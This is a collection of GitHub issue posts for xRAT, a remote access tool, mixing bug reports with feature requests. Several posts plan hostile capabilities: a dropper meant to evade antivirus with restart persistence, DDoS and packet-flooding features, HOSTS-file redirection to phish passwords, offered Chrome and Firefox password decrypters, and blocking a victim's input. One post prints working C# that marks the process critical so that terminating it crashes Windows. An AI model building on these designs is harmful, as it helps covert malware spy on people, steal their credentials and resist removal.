Apparently, the files with the size over 2mb cannot be downloaded the window just closes and client reconnects.

why you have removed F1:F12 Keys
is there any solution to get them handled ?

Issue where, when the client closes unexpectedly - often either shutting down the machine or closing via the server's command - the client cannot open the issue due to a Windows message popping up that states that there are 4 corrupted files in "C:\UsersMyUserName\Documents". Screenshot will be posted soon.

Enchancement Suggestion:

1. Navigation to the actual file can be a bit difficult because it is necessary to open up a File Manager Form. There should be a more natural way to actually get to the file in the Keylogger Form. Perhaps add a small menu could be shown by right-clicking on an entry in the Keylogger Form.
2. The Keylogger Form does not update when receiving an updated log file, which is a bit annoying. When receiving an updated log file, perhaps we could refresh the file that is in the Keylogger Form with the new data.
3. The data in the Keylogger Form shows the program title and the keys pressed. The time would be a desirable thing to add under each log entry. Example:
   Heading data on log~~
   Program #1 (Add time information here)
   ...keys pressed...
   Program#2 (Add time information here)
   ...keys pressed...

Problem:
In a Multi-Monitor setup, suppose you have two monitors. Open up a Remote Desktop Form and Start, then Stop the Remote Desktop for one of the monitors. Select the other monitor, then attempt to Start Remote Desktop once again. For some reason, this will cause the Client to stop functioning (a window from Windows will pop up stating such, and the Client will crash entirely).

Edit Note 1:
I have two monitors with differing resolutions (1920x1080) and (1080x760).

Edit Note 2:
This problem will not only crash the Client out, but the Server will also crash entirely. Implementing a try-catch for each form disposal here (https://github.com/MaxXor/xRAT/blob/f9b52c804dcad48ea2a7e0ac8c3681b97682c4df/Server/Core/UserState.cs#L46-59) should fix a situation where one issue with any of the many Forms to be disposed will break the entire Server.

A button or a right click feature in File Manager opening a RemoteShell window cd-ing to the present directory in the File Manager window same as the Open in command prompt in File Explorer of windows will be useful. This may be one step forward to a complete File Manager.

Features to Eject a Removable Drive, changing attributes of files would be awesome

Some people type their passwords one character back and forth. so implementing arrow keys might be useful.

VK_ codes are 37, 38, 39,40
Print Screen is 44.

I was looking at project's main page
and found under ToDo:
Socks5 Proxy

so can i suggest a project would help us to achieve this
Project's Name: Socks5
https://github.com/ThrDev/Socks5
It is stable but it is normal Proxy and need little changes to be Reverse Proxy
so if anyone like the idea go with it and try
If no one likes it just close the issue

Typo with "_canceledDownloads"
https://github.com/MaxXor/xRAT/blob/master/Client/Core/Commands/CommandHandler.cs#L33

There seems to be alot of classes that have spaces and alot of classes that tabbing.

This causes alot of inconsistencies when trying to push commits. Could you perform a Format code to all documents?

I believe this can be done by highlighting all the class files throughout the program and hitting Ctrl + K + D

Adding a feature to ping 192.168.1.1 to 192.168.1.255 (or any other range) would be useful for diagnosis of network problems. The .NET Framework has built in class for pinging.

@MaxXor could you please add AppVeyor integration to this repo so that people could download the latest binaries directly from GitHub without compiling in their machines. Plus, we can check whether the code compiles without any errors. Adding deployment to GitHub releases. That's it. I have already tried AppVeyor with the copy of your repo.

AppVeyor integrates with GitHub seamlessly and automates all builds when properly configured.

Fix soon
https://github.com/MaxXor/xRAT/blame/6228b5fc8f0e10bda7de361fc0e0c6300a9e185c/Server/Forms/FrmMain.cs#L506

Perhaps we should add the 'Control' key to the Keylogger. Looking back at logs I have generated on myself, it is just a bit strange to see things like:
zzzzzzzzzzzzyyyyyyzzzzzzzzzzzzz

Add Escape key since many use Ctrl + Escape key to open start screen (or menu), Task Manager in windows by using Ctrl+Shift+Esc command. So somebody add [ESC] key.

Suggestion:
The 'JpgCompression' class is located under (Server/Client)/Core/Misc/JpgCompression.cs
Perhaps the class should be moved with (Server/Client)/Core/Compression/ with SafeQuickLZ.cs

The 'Save Changes?' prompt does not make sure there were actual changes, so they come up even if a change has not been made. The prompt should calculate changes so it is not shown without purpose.

If you create a client with a password that does not match the server, the server will become completely unresponsive while that client is trying to connect. Killing the client will restore use of the server app.

i see that you can only get screen shots could you add in screen capture? and great project by the way!

Add code to block mouse and keyboard input in client side code.

When attempting to download a file that is in the root directory, it will not work. The status message in the downloads tab states that it was not found.

1. Find why it isn't working and fix the bug (of course).
2. Modify the catch clause - where it is "catch (IOException)" - and don't let it set all issues caused by IOExceptions write the status as "File Not Found." because there are other IOExceptions that can thrown by trying to download a file.

Could anyone please add Reverse Connection functionality. xRAT is the best Remote Access Tool I have ever seen. Reverse Connection is useful when a server is unreachable if it is behind a router without UPnP and port forwarding is impossible. Servers can be deployed without port forwarding the routers if Reverse Connection is enabled. Reverse Connection as a separate feature (or as a opt-in feature) is like being in heaven. It allows for unattended Server installations

Checked almost everything. Uptill now everything works fine except remote shell.
{u may revert back shell to previous state}

PFA screen shot.

We can make an app only having app logic to download the main xRAT Client.exe ( say from an ftp server) so that the deployer application will not be flagged as virus. Moreover, this can be used as an updater and also a persistence which checks if the client.exe runs and if that client.exe is not running, it will start it again.

Add DDoS support with forms to add new IPs or websites.

Already known, but just kept here in case others would like to investigate or propose fixes to these issues with the Remote Desktop feature.

Issues:

1. Sucks down memory on the Client - Yes, the Garbage Collector will eventually collect the unused resources that have gone astray. However, it does so every second (low-blow to the performance train). It could be very negative to the user if the machine being used is rather poor. The memory allocations will stay around 200MB to 700MB while running the Remote Desktop tool. It will cycle up and down those limits as fast as 3/4 of a second to 1 second...
2. Issues with multiple monitors:
   --> When receiving data of a monitor that is larger than the one you are watching (ex: client has a 1920x1080 monitor and yours is 1080x760) the smaller monitor does not correctly scale the image. This issue is likely due to the way changes are calculated on the client. It causes random pixel anomalies (black pixels, poor resolution in some patches).

when trying to press ctrl+z (as an example) it is logged correctly
but when trying to press [CTRL+Shift+any letter] it don't log shift key but instead of that it capitalize the letter example : when i press [CTRL+Shift+z] it is logged [CTRL-Z]
and the same issue when i press [ALT+Shift+z] is logged [ALT-Z] - with the letter capitalized

Hey,

I'm also currently working on a RAT, and your project really helped me with some ideas, so I thought I'd give you something in return. I have Java code which uses a native c# dll to decrypt the chrome passwords and a c++ dll which decrypts firefox passwords. I'd be willing to give them to you or to explain to you how you could write your own decrypter.

Best regards

Mrnikbobjeff

Hi, I'm not really sure because I have a shitty internet connection. Is the screen surveillance only a screenshot of the screen or it's a live continuous stream?

There more cross thread through out the project. I also notice a few other things would be helpful. To change the details of the bat. During the build of the client. If you don't mine I can upload fix with details info added..

Installing the client to %appdata% without a subdirectory causes this:

I think this would be a rarely used feature however, one can frustrate a user(client) by blocking access to a website by adding values in the HOSTS file in C:\Windows\System32\drivers\etc.

I am sure you all know how to do this but for newcomers;
For example - to block www.facebook.com,

127.0.0.1 www.facebook.com

It would be awesome to add a separate form to block websites. This feature would provide a basement to phish websites using this technique.Redirect a website to localhost(say facebook)using the HOSTS file, start a minimalistic server running a copy of that website(there are plenty of c# http servers in GitHub) and get those passwords.

Please look in it once. Keylogger added in xRAT which works absolutely fine in debug mode but Client-Built from xRAT server is unstable.

Keylogger thread might be locking some threads to start.
https://github.com/madified/xRAT

Reproducing:

1. Clean solution
2. Press the start button (just build and run the Server).
3. Try to build a Client (will crash).

Why?:

The top of the 'Build' method (that builds the Client) loads the Client's built .bin file into a variable, but fails to take into account the chance that it is not there or is unusable.

I have marked this as an issue because, while it is something the server can't do much about (we need that .bin file!), the server should not crash just for trying to build a Client.

Where?:

https://github.com/MaxXor/xRAT/tree/master/Server/Core/Build/ClientBuilder.cs#L15

Solution:

I just wanted to bring this to your attention and let you handle it. To solve this issue, just enclose the variable in its own try-catch. That way, it will still fail, but we will not crash and burn. :)

Note: I personally suggest it has its own try-catch block so that you can give a special Exception message that states something like: "Unable to load the Client Assembly Information. Please re-build the Client."

Is QuickLZ really the best choice as compression algorithm ??
as there is TWO more algorithms do a good job with compression
after i searched for sometime i found that there is Snappy (fastest between them) Algorithm and LZ4 (latest is very fast)
both of them do a great job and they faster (a bit) than QiuckLZ
you can find a comparison between them here :
http://encode.ru/threads/1266-In-memory-benchmark-with-fastest-LZSS-%28QuickLZ-Snappy%29-compressors

While I looked back all the feature requests, i thought some of these feature requests need admin rights. What about Implementing all these features, making a try catch and if the feature requests for admin rights and if the client denies, send a packet to server saying that the command failed.
Especially the issue #81 is superb.
#88 is dormant.

I beg you all to read all my issues and feature requests. Some of them may be really useful.

BTW this is the 💯 th issue.

The wiki of this repo remains unupdated

It is indeed a great effort. There's just a little bug. On server end remote shell is displaying 2nd last response instead of latest one.

The original connection issue I had with not being able to get through my modem/router appeared to work temporarily but it was a fluke. I can set port forward to work with P2P, and CanYouSeeMe.org can see my connection, but no inbound connections succeed.

I got around this by using the proXPN vpn, a great vpn with free option that works nicely with xRat - as long as the server and client are running on the same machine. The connection goes through the proxy and everything plays nice with both pieces of software on my local machine, but as soon as I try to go between two machines the server software goes from "listening: True" to "listening: False" the moment the incoming connection arrives. I can prove it by leaving the server up as long as I like and it will continue to listen for a connection, but as soon as I bring up a client on a second machine the server stops listening.

Current code pulled 14 days ago, compiled with 2010 express, tested between an XP laptop and a Vista desktop in both directions with the same results.

I have port forwarding setup through my modem and router to my desktop for the standard remote desktop port 3389.

When xRat is running, the service at http://www.canyouseeme.org/ can successfully see my service on port 3389.

When I create a client for IP/Hostname localhost and run that client on my desktop I get a connection.

When I create a client for my hardcoded external IP address (no DNS lookup) and run that on my desktop I do not get a connection.

I've been hacking at this all morning and can't get past the point where the client can't connect to an external IP with proper port forwarding configured and externally visible.

windoze, router, and modem firewalls all disabled.

add a feature to keep the mouse moving continuously to random locations or place it at a specified position for a long time.
This is possible using Mouse Hook which is really simple

Please add this feature.
It can be used to play pranks and have fun

*- I think it would be a good idea to add "Open Containing Folder" to files in transfers list or make it like "Total Commander" with 2 separate file windows
*- adding Common DIRs like appdata- startup to quickly reach them (suggest to add them combobox)
*- another addition would make the Key log looks great (colorizing the window title and add the time at the end)

A Download Manager(simple) would be useful in a scenario where one wants to exploit a friend's internet and download whatever he wants. He goes to the victim's home and copies everything that xRAT download manager has downloaded.

This may be used to download files from URLs mentioned in a txt file. The server can send commands to add new downloads or manage them.

We can use projects for download managers in c# that are available in GitHub and integrate one of them in xRAT.

I have created a downloader in C# which communicates with aria2c, a powerful download manager, developed by a Japanese programmer in C++. I use it in internet cafes to download whatever I need.

I checked multiple commits, and client-built is totally unstable after commit "Optimized Server Start | e325a78". Infact client-built don't even starts on Windows 8.1 Pro and Windows XP sp3.

I have written a program that very quickly sends packets to a specified destination quite efficiently. I noticed that the "Visit a Website" feature only sends a single requests. Perhaps there could be a few extra options added to the GUI that would allow continuous sending of packets to a destination. I have the code to provide from a project I was messing with and ready to implement, but I was wondering if this is a feature you would like to be added.

i setup a client and tested it
the keylogger was working great but unfortunately it suddenly stopped working after 30 min aprox. and just log the windows title and blank line under it

this is an attachment shows the problem

Just came across some website with this snippet of code. Actually it was in C++. I made use of this with PInvoke.

Calling ProtectProcess() makes the process critical. A critical process cannot be terminated. When a user with admin rights terminates it, it either shows an alert "Access Denied" or else the system crashes causing a BSOD(Blue Screen of Death).

Not sure whether this code will work with systems running Windows 8 or later, I'm on vacation. So I couldn't get a chance to test it.

Just call RevertProtection() to revert back to normal.

public static class Persistence
{
    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);

    public static void ProtectProcess()
    {
        System.Diagnostics.Process.EnterDebugMode();
        RtlSetProcessIsCritical(1, 0, 0);
    }

    public static void RevertProtection()
    {
        RtlSetProcessIsCritical(0, 0, 0);
    }
}

Can be invoked from any part of code. Mr. @MaxXor or anyone else interested, Please try this code out bcoz I don't have a PC nearby with VS2013 installed.

Enhancement Suggestion
Perhaps the client code should be obfuscated before building. It is a shame to plop the client into ILSpy or .NET Reflector and see something very similar to the client's source code!